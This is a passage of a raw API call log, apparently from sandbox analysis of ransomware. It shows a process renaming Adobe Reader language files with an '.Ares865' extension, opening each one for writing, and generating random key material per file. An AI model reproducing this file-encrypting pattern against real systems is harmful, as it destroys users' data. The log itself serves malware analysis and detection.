(hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.342] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_IQ.txt" | out: lpString1="DisplayLanguageNames.ar_IQ.txt") returned="DisplayLanguageNames.ar_IQ.txt" [0159.342] lstrlenW (lpString="DisplayLanguageNames.ar_IQ.txt") returned 30 [0159.342] lstrlenW (lpString="Ares865") returned 7 [0159.342] lstrcmpiW (lpString1="_IQ.txt", lpString2="Ares865") returned -1 [0159.343] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt.Ares865") returned 115 [0159.343] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt.ares865"), dwFlags=0x1) returned 1 [0159.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.345] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.345] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.346] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.351] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.352] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.352] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.353] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_JO.txt" | out: lpString1="DisplayLanguageNames.ar_JO.txt") returned="DisplayLanguageNames.ar_JO.txt" [0159.353] lstrlenW (lpString="DisplayLanguageNames.ar_JO.txt") returned 30 [0159.353] lstrlenW (lpString="Ares865") returned 7 [0159.353] lstrcmpiW (lpString1="_JO.txt", lpString2="Ares865") returned -1 [0159.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt.Ares865") returned 115 [0159.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt.ares865"), dwFlags=0x1) returned 1 [0159.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.355] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.356] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.356] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.360] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.360] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.360] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.361] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_KW.txt" | out: lpString1="DisplayLanguageNames.ar_KW.txt") returned="DisplayLanguageNames.ar_KW.txt" [0159.361] lstrlenW (lpString="DisplayLanguageNames.ar_KW.txt") returned 30 [0159.361] lstrlenW (lpString="Ares865") returned 7 [0159.361] lstrcmpiW (lpString1="_KW.txt", lpString2="Ares865") returned -1 [0159.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt.Ares865") returned 115 [0159.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt.ares865"), dwFlags=0x1) returned 1 [0159.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.364] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.364] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.364] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.369] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.370] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_LB.txt" | out: lpString1="DisplayLanguageNames.ar_LB.txt") returned="DisplayLanguageNames.ar_LB.txt" [0159.371] lstrlenW (lpString="DisplayLanguageNames.ar_LB.txt") returned 30 [0159.371] lstrlenW (lpString="Ares865") returned 7 [0159.371] lstrcmpiW (lpString1="_LB.txt", lpString2="Ares865") returned -1 [0159.371] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt.Ares865") returned 115 [0159.371] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt.ares865"), dwFlags=0x1) returned 1 [0159.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.374] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.379] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.380] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.380] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.381] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_LY.txt" | out: lpString1="DisplayLanguageNames.ar_LY.txt") returned="DisplayLanguageNames.ar_LY.txt" [0159.381] lstrlenW (lpString="DisplayLanguageNames.ar_LY.txt") returned 30 [0159.381] lstrlenW (lpString="Ares865") returned 7 [0159.381] lstrcmpiW (lpString1="_LY.txt", lpString2="Ares865") returned -1 [0159.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt.Ares865") returned 115 [0159.381] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt.ares865"), dwFlags=0x1) returned 1 [0159.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.384] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.388] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.389] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_MA.txt" | out: lpString1="DisplayLanguageNames.ar_MA.txt") returned="DisplayLanguageNames.ar_MA.txt" [0159.389] lstrlenW (lpString="DisplayLanguageNames.ar_MA.txt") returned 30 [0159.389] lstrlenW (lpString="Ares865") returned 7 [0159.389] lstrcmpiW (lpString1="_MA.txt", lpString2="Ares865") returned -1 [0159.390] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt.Ares865") returned 115 [0159.390] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt.ares865"), dwFlags=0x1) returned 1 [0159.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.394] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.394] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.398] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.400] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_OM.txt" | out: lpString1="DisplayLanguageNames.ar_OM.txt") returned="DisplayLanguageNames.ar_OM.txt" [0159.400] lstrlenW (lpString="DisplayLanguageNames.ar_OM.txt") returned 30 [0159.400] lstrlenW (lpString="Ares865") returned 7 [0159.400] lstrcmpiW (lpString1="_OM.txt", lpString2="Ares865") returned -1 [0159.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt.Ares865") returned 115 [0159.400] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt.ares865"), dwFlags=0x1) returned 1 [0159.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.411] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.412] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.417] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.417] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.418] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_QA.txt" | out: lpString1="DisplayLanguageNames.ar_QA.txt") returned="DisplayLanguageNames.ar_QA.txt" [0159.418] lstrlenW (lpString="DisplayLanguageNames.ar_QA.txt") returned 30 [0159.418] lstrlenW (lpString="Ares865") returned 7 [0159.419] lstrcmpiW (lpString1="_QA.txt", lpString2="Ares865") returned -1 [0159.419] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt.Ares865") returned 115 [0159.419] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt.ares865"), dwFlags=0x1) returned 1 [0159.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.421] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.422] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.426] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.428] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_SA.txt" | out: lpString1="DisplayLanguageNames.ar_SA.txt") returned="DisplayLanguageNames.ar_SA.txt" [0159.428] lstrlenW (lpString="DisplayLanguageNames.ar_SA.txt") returned 30 [0159.428] lstrlenW (lpString="Ares865") returned 7 [0159.428] lstrcmpiW (lpString1="_SA.txt", lpString2="Ares865") returned -1 [0159.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt.Ares865") returned 115 [0159.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt.ares865"), dwFlags=0x1) returned 1 [0159.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.436] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_SD.txt" | out: lpString1="DisplayLanguageNames.ar_SD.txt") returned="DisplayLanguageNames.ar_SD.txt" [0159.437] lstrlenW (lpString="DisplayLanguageNames.ar_SD.txt") returned 30 [0159.437] lstrlenW (lpString="Ares865") returned 7 [0159.437] lstrcmpiW (lpString1="_SD.txt", lpString2="Ares865") returned -1 [0159.437] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt.Ares865") returned 115 [0159.437] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt.ares865"), dwFlags=0x1) returned 1 [0159.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.439] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27798) returned 1 [0159.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.440] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.440] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.443] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.443] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.443] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.444] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ar_SY.txt" | out: lpString1="DisplayLanguageNames.ar_SY.txt") returned="DisplayLanguageNames.ar_SY.txt" [0159.444] lstrlenW (lpString="DisplayLanguageNames.ar_SY.txt") returned 30 [0159.444] lstrlenW (lpString="Ares865") returned 7 [0159.444] lstrcmpiW (lpString1="_SY.txt", lpString2="Ares865") returned -1 [0159.445] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt.Ares865") returned 115 [0159.445] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt.ares865"), 